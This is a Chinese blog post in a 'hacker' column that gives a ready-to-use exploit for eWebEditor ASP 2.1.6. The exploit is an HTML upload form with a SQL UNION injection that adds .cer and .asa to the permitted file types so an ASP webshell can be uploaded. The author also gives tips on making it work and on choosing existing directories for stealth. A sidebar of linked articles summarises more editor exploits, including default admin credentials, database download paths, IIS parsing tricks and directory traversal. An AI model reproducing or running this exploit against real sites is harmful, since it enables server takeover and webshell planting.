ewebeditor上传漏洞

最新推荐文章于 2024-05-14 21:22:10 发布
最新推荐文章于 2024-05-14 21:22:10 发布
阅读量659 收藏
点赞数
分类专栏: hacker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84044997
版权 
<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br>
<form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S_ID,S_Name,S_Dir,S_CSS,'UploadFile',S_Width,S_Height,S_Memo,S_IsSys,[S_FileExt]%2b'|cer' ,S_FlashExt,[S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

 这是别人写的,我改了下,其中标红的时要注意的。

第一个地方最好加上1=2,不然实际应用中有可能union的不会被加上

第二个地方是可以自自定义上传路径的,但是一定要是存在的,可以考虑

写道
Admin
ButtonImage
CSS
db
Dialog
Example
Include
SysImage

 

这样可以有一定的隐蔽性,别的就没什么了

wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ewebeditor漏洞与防范专题资源
10-07
个人收集的ewebeditor漏洞与防范专题文档,希望对Web开发人员有参考作用。
eWebEditor 2.1.6 asp版 上传漏洞利用程序
10-18
eWebEditor 2.1.6 asp版 上传漏洞利用程序 eWebEditor 2.1.6 asp版 上传漏洞利用程序 eWebEditor 2.1.6 asp版 上传漏洞利用程序
ewebeditor漏洞大全
热门推荐
xysoul的专栏
03-23 1万+
1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一份(直接修改改不了) 在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览 在编辑器里点设计    然后直接上传asa大马. 上传后 在代码里可以看到马的位置!
22-任意文件上传与编辑器漏洞Ewebeditor、fckeditor、CKFinder、southidceditor等)(五)
最新发布
XLbb的博客
05-14 1299
其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。:升级编辑器,实施严格的文件上传策略,禁用IIS不安全的文件解析功能。
web安全-上传漏洞-Ewebeditor编辑器漏洞利用
Coisini的博客
05-31 7948
Ewebeditor简介 漏洞利用 ***默认路径就不一定了,有可能是“edit/admin_login.asp”或者“admin/edit/admin_login.asp”。(默认密码后台:admin,admin) 如果eWebEditor的后台用户名和密码都已经被修改了,那么我们还可以通过下载数据库来获得管理员用户名和密码,数据库默认的下载路径为“/db/ewebeditor.mdb”。下载...
网安学习Day16-文件上传漏洞(下)
weixin_44770698的博客
05-11 737
解析漏洞 IIS6/7.X IIS6.0版本中,存在着目录解析漏洞和文件解析漏洞。 其中的网站的目录下的*.php的文件夹下的文件会被当做php来执行,也就是说我们在上传文件的时候可以上传一个1.php/2.jpg的文件,那么在IIS6.0的环境下,2.jpg会被当做php来执行。 IIS6.0还对应着文件解析漏洞,如果出现“;”号,则IIS6.0会出现错误,例如1.php;2.jpg,它会将分号后面的文件当做php来执行。 IIS7.0 7.5具有文件解析漏洞 在IIS7.x的环境中,当我们开
ewebeditor php漏洞,ewebeditor for php任意文件上传漏洞
weixin_34952098的博客
03-11 124
漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:$sUsername = "admin";$sPassword = "admin";$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|...
Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
收集盒 Book box
04-21 1188
<br />以前曾进过一个网站,把上传部份的asp代码下载回来研究,当时感觉有漏洞但没仔细研究,还以为那是他们自已写的程序。<br />前几天看到ewebeditor漏洞的文章才想起那个网站原来用的也是ewebeditor。今天仔细看了看,发现问题了(2.1
eWebEditor7-修复漏洞上传
11-09
 文件 I.JS// eWebEditor 7.0 设置文件  文件 upload.asp//上传文件,不提供上传,就把文件名修改其它名或者删除  文件 upfileclass.asp//上传文件  文件 browse.asp//浏览上传文件 目录 sharefile  目录 ...
太子黑盟最新ewebeditor asp版 上传漏洞利用工具.rar
11-14
太子黑盟最新ewebeditor asp版 上传漏洞利用工具.rar
eWebEditor 7.0 支持上传版 在线html编辑器
10-28
说明: 把eWebEditor7文件夹放入网站根目录,本eWebEditor 7.0支持上传,无后门放心使用。 目录 ASP 文件 I.JS // eWebEditor 7.0 设置文件 文件 upload.asp //上传文件,不提供上传,就把文件名修改其它名或者删除 文件 upfile_class.asp//上传文件 文件 browse.asp //浏览上传文件 目录 sharefile 目录 media //放共享视频文件 目录 image //放共享图片文件 目录 flash //放共享FLASH文件 目录 0ther //放共享办公文件 注:上次发布 eWebEditor 6.8 静态版,被大多菜鸟骂。不知我做得不够好还是鸟太菜了,吃力不讨好。 本次发布eWebEditor 7.0 上传版,希望不要太多骂声。功能有点限制,有经济的朋友请支持正版。
ewebeditor远程上传漏洞
weixin_34236497的博客
12-30 251
有人说通杀,有人说2.8以后…… 远程上传时执行代码 导致get shell 1.把yc.gif.asp xiaoma.ASa放在同一目录下(本地的) ——————————————远程文件(yc.gif.asp)—————————————————— <%Setfs=CreateObject("Scripting.FileSystemObject"...
『原创』ewebeditor 2.1.6 上传漏洞利用工具
spacehacker的小屋
03-09 1470
朋友说原来的ewebeditor 2.1.6 HTML版用着太麻烦,每次还得输入地址,叫我帮忙写一个。。。- -|||ewebeditor 2.1.6 上传漏洞利用工具 ewebeditor在网上用的虽然多,但是很不好判断版本点上传后只要版本是2.1.6如果不出问题的话就能直接获得WebShell 用vb写的查了不少关于xmlhttp返回信息是乱码的资料by
ewebeditor上传结合IIS解析漏洞
收集盒 Book box
08-29 747
google关键字:intext:版权所有:yfcms 利用文件:admin\WebEditor\asp\upload.asp 利用代码: action=save&type=image&style=popup&cusdir=admin8.asp” method=post
Ewebeditor最新漏洞漏洞大全
java开发指南博客 【转载】
04-02 413
Ewebeditor最新漏洞漏洞大全[收集] 来源:转载作者:佚名时间:2009-06-03 00:04:26 以下文章收集转载于网络:) 算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器, 所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。 漏洞更新日期TM: 2009 2 9日转...
Ewebeditor文件上传问题
Linuxer
07-04 2220
Normal 0 7.8 磅 0 2 false false false MicrosoftInternetExplorer4 <!-- /* S
ewebeditor asp版5.5-6.X解析漏洞0day
weixin_34357267的博客
10-29 340
影响版本:ewebeditor5.5版,对6.X以上版本也管用,对ASP。aspx。JSP。均管用。 转载地址:http://www.chouwazi.com/article.asp?id=301 ewebeditor5.5版没有mdb数据库,账号和密码存在配置文件 漏洞描述:利用IIS的解析漏洞建立一个XX.asp的文件夹,上传jpg拿webshell 1....
ewebeditor漏洞
08-23
引用:ewebeditor是一种在线web编辑器,也被称为富文本编辑器。它可以内嵌于浏览器中,实现所见即所得的文本编辑功能。但由于该编辑器具有类似于Word的功能,包括图片显示,可能会导致文件上传漏洞。 引用:该漏洞可以通过将编辑器的目录放在网站目录下,并在物理机上访问该网站来模拟。 引用:具体来说,可以通过在默认网站属性中启用父路径选项,然后在网址后面添加"&dir=../../.."来访问C盘根目录,并进行随意删除等操作。 综上所述,ewebeditor存在文件上传漏洞,攻击者可以通过利用漏洞访问服务器上的文件,并进行恶意操作。建议用户及时更新并使用最新版本的编辑器,以避免潜在的安全风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [漏洞复现篇——ewebeditor编辑器解析漏洞](https://blog.csdn.net/weixin_45728976/article/details/104367111)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值